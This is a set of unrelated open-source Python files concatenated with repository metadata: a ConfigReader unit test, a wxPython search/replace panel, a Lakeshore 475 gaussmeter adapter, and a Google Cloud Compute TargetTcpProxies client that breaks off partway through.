# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from wtframework.wtf.config import ConfigReader, ConfigFileReadError
import unittest
class TestConfigReader(unittest.TestCase):
def test_get_returns_string_config_value(self):
'''
Test config value returned is expected value
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("string_test")
self.assertEqual(value, "some value", "Value did not match expected.")
def test_get_with_default_value(self):
"Test the get method returns value if available or the the default."
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("some value", config.get("string_test", "default value"))
self.assertEqual("default value", config.get("i_dont_exist", "default value"))
def test_get_handles_namespaced_keys(self):
'''
Test ConfigReader works with namespaced keys like, path.to.element
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("bill-to.given")
self.assertEqual(value, "Chris", "Value did not match expected.")
def test_get_handles_yaml_arrays(self):
'''
Test ConfigReader works with YAML arrays.
'''
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("dogs", config.get("list_test")[0])
self.assertEqual("cats", config.get("list_test")[1])
self.assertEqual("badgers", config.get("list_test")[2])
def test_get_with_cascaded_config_files(self):
'''
Test Config reader loaded up with multiple configs loads
the config preferences in order.
'''
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertEqual("hello", config.get("setting_from_config1"))
# this will take the config from config2, which has precedence.
self.assertEqual("beautiful", config.get("overwrite_setting"))
# this will take the setting form config2.
self.assertEqual("hi", config.get("setting_from_config2"))
def test_get_with_missing_key_and_no_default(self):
"An error should be thrown if the key is missing and no default provided."
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertRaises(KeyError, config.get, "setting_that_doesnt_exist")
def test_specifying_bad_config_file(self):
"Test error is thrown when invalid config file is specified."
self.assertRaises(ConfigFileReadError, ConfigReader, "tests/TestConfig1,NOSUCHFILE")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
LeXuZZ/localway_tests
|
wtframework/wtf/tests/test_config_reader.py
|
Python
|
gpl-3.0
| 3,596
| 0.003337
|
# -*- coding: utf-8 -*-
import os.path
import wx
from outwiker.core.system import getImagesDir
class SearchReplacePanel (wx.Panel):
def __init__(self, parent):
super(SearchReplacePanel, self).__init__(
parent,
style=wx.TAB_TRAVERSAL | wx.RAISED_BORDER)
self._controller = None
self._createGui()
self._bindEvents()
        # GUI elements related to the replace functionality
self._replaceGui = [self._replaceLabel,
self._replaceText,
self._replaceBtn,
self._replaceAllBtn,
]
self.setReplaceGuiVisible(False)
def setController(self, controller):
self._controller = controller
@property
def searchTextCtrl(self):
return self._searchText
@property
def replaceTextCtrl(self):
return self._replaceText
@property
def resultLabel(self):
return self._resultLabel
def setReplaceGuiVisible(self, visible):
"""
        Set whether the replace-related GUI elements should be shown
"""
for item in self._replaceGui:
item.Show(visible)
self.Layout()
def _bindEvents(self):
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._searchText)
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._replaceText)
self.Bind(wx.EVT_TEXT, self.__onSearchTextChange, self._searchText)
self.Bind(wx.EVT_BUTTON, self.__onNextSearch, self._nextSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onPrevSearch, self._prevSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplace, self._replaceBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplaceAll, self._replaceAllBtn)
self.Bind(wx.EVT_BUTTON, self.__onCloseClick, self._closeBtn)
for child in self.GetChildren():
child.Bind(wx.EVT_KEY_DOWN, self.__onKeyPressed)
def _createGui(self):
        # Input field for the search phrase
self._searchText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
        # Input field for the replacement text
self._replaceText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
        # Interface elements related to searching
self._findLabel = wx.StaticText(self, -1, _(u"Find what: "))
# Кнопка "Найти далее"
self._nextSearchBtn = wx.Button(self, -1, _(u"Next"))
# Кнопка "Найти выше"
self._prevSearchBtn = wx.Button(self, -1, _(u"Prev"))
        # Label showing the search result
self._resultLabel = wx.StaticText(self, -1, "")
self._resultLabel.SetMinSize((150, -1))
        # Interface elements related to replacing
self._replaceLabel = wx.StaticText(self, -1, _(u"Replace with: "))
# Кнопка "Заменить"
self._replaceBtn = wx.Button(self, -1, _(u"Replace"))
# Кнопка "Заменить все"
self._replaceAllBtn = wx.Button(self, -1, _(u"Replace All"))
self._closeBtn = wx.BitmapButton(
self,
-1,
wx.Bitmap(os.path.join(getImagesDir(), "close-button.png"),
wx.BITMAP_TYPE_ANY))
self._layout()
def _layout(self):
self._mainSizer = wx.FlexGridSizer(cols=6)
self._mainSizer.AddGrowableCol(1)
        # Search-related interface elements
self._mainSizer.Add(self._findLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._searchText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._nextSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._prevSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._closeBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=1)
self._mainSizer.Add(self._resultLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
        # Replace-related interface elements
self._mainSizer.Add(self._replaceLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._replaceAllBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
# self._mainSizer.AddStretchSpacer()
# self._mainSizer.AddStretchSpacer()
self.SetSizer(self._mainSizer)
self.Layout()
def __onNextSearch(self, event):
if self._controller is not None:
self._controller.nextSearch()
def __onPrevSearch(self, event):
if self._controller is not None:
self._controller.prevSearch()
def __onReplace(self, event):
if self._controller is not None:
self._controller.replace()
def __onReplaceAll(self, event):
if self._controller is not None:
self._controller.replaceAll()
def __onSearchTextChange(self, event):
if self._controller is not None:
self._controller.enterSearchPhrase()
def __onKeyPressed(self, event):
key = event.GetKeyCode()
if key == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def __onEnterPress(self, event):
if self._controller is None:
return
if self._replaceText.IsShown():
self._controller.replace()
else:
self._controller.nextSearch()
def __onCloseClick(self, event):
self.Close()
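# Usage sketch (not part of the original module; ``parent`` and ``controller`` are
# assumed to come from the surrounding OutWiker GUI code, with the controller
# implementing nextSearch(), prevSearch(), replace(), replaceAll() and
# enterSearchPhrase()):
#
#   panel = SearchReplacePanel(parent)
#   panel.setController(controller)
#   panel.setReplaceGuiVisible(True)   # show the replace row in addition to search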
|
unreal666/outwiker
|
src/outwiker/gui/searchreplacepanel.py
|
Python
|
gpl-3.0
| 6,309
| 0
|
"""
Contains methods for working with the Lakeshore 475 Gaussmeter
"""
from quantities import Quantity
from typing import Optional
from instruments.lakeshore import Lakeshore475 as _Lakeshore475
from time import sleep
class Lakeshore475(object):
"""
Adapter layer for IK's Lakeshore 475 implementation
"""
_port = '/dev/ttyUSB0'
_address = 12
_managed_instance = None
_constructor = _Lakeshore475
@property
def port_name(self) -> str:
"""
:return: The port to which this magnetometer will be attached
"""
return self._port
@port_name.setter
def port_name(self, new_port_name: str) -> None:
"""
:param new_port_name: The new port
:return:
"""
self._port = new_port_name
@property
def address(self) -> int:
"""
:return: The address
"""
return self._address
@address.setter
def address(self, new_address: int) -> None:
"""
:param new_address: The desired address
:return:
"""
self._address = new_address
@property
def _magnetometer(self) -> Optional[_Lakeshore475]:
"""
:return: The instance of the magnetometer that this adapter manages, or
None if there is no instance.
.. note::
The 1 second delay is required for the gaussmeter to reset
itself and accept commands
"""
if self._managed_instance is None:
self._managed_instance = self._constructor.open_gpibusb(
port=self.port_name, gpib_address=self.address)
sleep(1)
return self._managed_instance
@property
def field(self) -> Quantity:
"""
:return: The measured magnetic field from the Gaussmeter
"""
try:
return self._magnetometer.field
except ValueError:
            return -100000.0 * self._magnetometer.field_units  # type: Quantity
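# Usage sketch (the port and GPIB address below are just the class defaults shown
# above, not a recommendation for any particular setup):
#
#   gaussmeter = Lakeshore475()
#   gaussmeter.port_name = '/dev/ttyUSB0'
#   gaussmeter.address = 12
#   field = gaussmeter.field   # lazily opens the connection, then reads the field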
|
MichalKononenko/MrFreeze
|
mr_freeze/devices/lakeshore_475.py
|
Python
|
agpl-3.0
| 2,013
| 0.000497
|
../../../../../../../share/pyshared/orca/scripts/apps/packagemanager/script_settings.py
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/scripts/apps/packagemanager/script_settings.py
|
Python
|
gpl-3.0
| 87
| 0.022989
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.compute_v1.services.target_tcp_proxies import pagers
from google.cloud.compute_v1.types import compute
from .transports.base import TargetTcpProxiesTransport, DEFAULT_CLIENT_INFO
from .transports.rest import TargetTcpProxiesRestTransport
class TargetTcpProxiesClientMeta(type):
"""Metaclass for the TargetTcpProxies client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[TargetTcpProxiesTransport]]
_transport_registry["rest"] = TargetTcpProxiesRestTransport
def get_transport_class(cls, label: str = None,) -> Type[TargetTcpProxiesTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class TargetTcpProxiesClient(metaclass=TargetTcpProxiesClientMeta):
"""The TargetTcpProxies API."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "compute.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TargetTcpProxiesClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TargetTcpProxiesClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> TargetTcpProxiesTransport:
"""Returns the transport used by the client instance.
Returns:
TargetTcpProxiesTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[client_options_lib.ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
        (1) if `client_options.api_endpoint` is provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
        default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
if client_options is None:
client_options = client_options_lib.ClientOptions()
use_client_cert = os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
use_mtls_endpoint = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_client_cert not in ("true", "false"):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
if use_mtls_endpoint not in ("auto", "never", "always"):
raise MutualTLSChannelError(
"Environment variable `GOOGLE_API_USE_MTLS_ENDPOINT` must be `never`, `auto` or `always`"
)
# Figure out the client cert source to use.
client_cert_source = None
if use_client_cert == "true":
if client_options.client_cert_source:
client_cert_source = client_options.client_cert_source
elif mtls.has_default_client_cert_source():
client_cert_source = mtls.default_client_cert_source()
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
elif use_mtls_endpoint == "always" or (
use_mtls_endpoint == "auto" and client_cert_source
):
api_endpoint = cls.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = cls.DEFAULT_ENDPOINT
return api_endpoint, client_cert_source
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, TargetTcpProxiesTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the target tcp proxies client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, TargetTcpProxiesTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
api_endpoint, client_cert_source_func = self.get_mtls_endpoint_and_cert_source(
client_options
)
api_key_value = getattr(client_options, "api_key", None)
if api_key_value and credentials:
raise ValueError(
"client_options.api_key and credentials are mutually exclusive"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, TargetTcpProxiesTransport):
# transport is a TargetTcpProxiesTransport instance.
if credentials or client_options.credentials_file or api_key_value:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
import google.auth._default # type: ignore
if api_key_value and hasattr(
google.auth._default, "get_api_key_credentials"
):
credentials = google.auth._default.get_api_key_credentials(
api_key_value
)
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
)
def delete_unary(
self,
request: Union[compute.DeleteTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Deletes the specified TargetTcpProxy resource.
Args:
request (Union[google.cloud.compute_v1.types.DeleteTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Delete. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
to delete.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.DeleteTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.DeleteTargetTcpProxyRequest):
request = compute.DeleteTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def get(
self,
request: Union[compute.GetTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.TargetTcpProxy:
r"""Returns the specified TargetTcpProxy resource. Gets a
list of available target TCP proxies by making a list()
request.
Args:
request (Union[google.cloud.compute_v1.types.GetTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Get. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
to return.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.TargetTcpProxy:
Represents a Target TCP Proxy
resource. A target TCP proxy is a
component of a TCP Proxy load balancer.
Global forwarding rules reference target
TCP proxy, and the target proxy then
references an external backend service.
For more information, read TCP Proxy
Load Balancing overview.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.GetTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.GetTargetTcpProxyRequest):
request = compute.GetTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def insert_unary(
self,
request: Union[compute.InsertTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy_resource: compute.TargetTcpProxy = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Creates a TargetTcpProxy resource in the specified
project using the data included in the request.
Args:
request (Union[google.cloud.compute_v1.types.InsertTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Insert. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy_resource (google.cloud.compute_v1.types.TargetTcpProxy):
The body resource for this request
This corresponds to the ``target_tcp_proxy_resource`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy_resource])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.InsertTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.InsertTargetTcpProxyRequest):
request = compute.InsertTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy_resource is not None:
request.target_tcp_proxy_resource = target_tcp_proxy_resource
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.insert]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list(
self,
request: Union[compute.ListTargetTcpProxiesRequest, dict] = None,
*,
project: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListPager:
r"""Retrieves the list of TargetTcpProxy resources
available to the specified project.
Args:
request (Union[google.cloud.compute_v1.types.ListTargetTcpProxiesRequest, dict]):
The request object. A request message for
TargetTcpProxies.List. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.services.target_tcp_proxies.pagers.ListPager:
Contains a list of TargetTcpProxy
resources.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.ListTargetTcpProxiesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.ListTargetTcpProxiesRequest):
request = compute.ListTargetTcpProxiesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def set_backend_service_unary(
self,
request: Union[compute.SetBackendServiceTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
target_tcp_proxies_set_backend_service_request_resource: compute.TargetTcpProxiesSetBackendServiceRequest = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Changes the BackendService for TargetTcpProxy.
Args:
request (Union[google.cloud.compute_v1.types.SetBackendServiceTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.SetBackendService. See the method
description for details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
whose BackendService resource is to be
set.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
